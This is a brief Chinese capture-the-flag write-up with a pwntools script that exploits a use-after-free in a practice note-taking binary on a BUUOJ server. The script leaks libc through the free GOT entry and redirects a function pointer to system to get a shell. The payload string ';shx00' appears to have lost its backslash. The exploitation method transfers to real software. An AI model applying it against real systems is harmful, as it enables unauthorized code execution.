查看保护
通过uaf改content指针为got,泄露出libc,接着改puts指针为system,放入;/shx00即可。
pwnable专题
from pwn import *
context(arch='i386', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 27791)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
menu = 'Your choice :'
def add(size, content):
r.sendlineafter(menu, '1')
r.sendlineafter('Note size :', str(size))
r.sendafter('Content :', content)
def delete(index):
r.sendlineafter(menu ,'2')
r.sendlineafter('Index :', str(index))
def show(index):
r.sendlineafter(menu, '3')
r.sendlineafter('Index :', str(index))
add(0x10, 'aaaa') #0
add(0x10, 'bbbb') #1
add(0x10, 'cccc') #2
delete(1)
delete(0)
free_got = elf.got['free']
addr = 0x804862b
add(8, p32(addr) + p32(free_got)) #3
show(1)
free_addr = u32(r.recv(4))
libc = ELF('./2.23/libc-2.23.so')
libc_base = free_addr - libc.sym['free']
system_addr = libc_base + libc.sym['system']
delete(3)
p1 = p32(system_addr) + b';shx00'
add(8, p1)
show(1)
r.interactive()
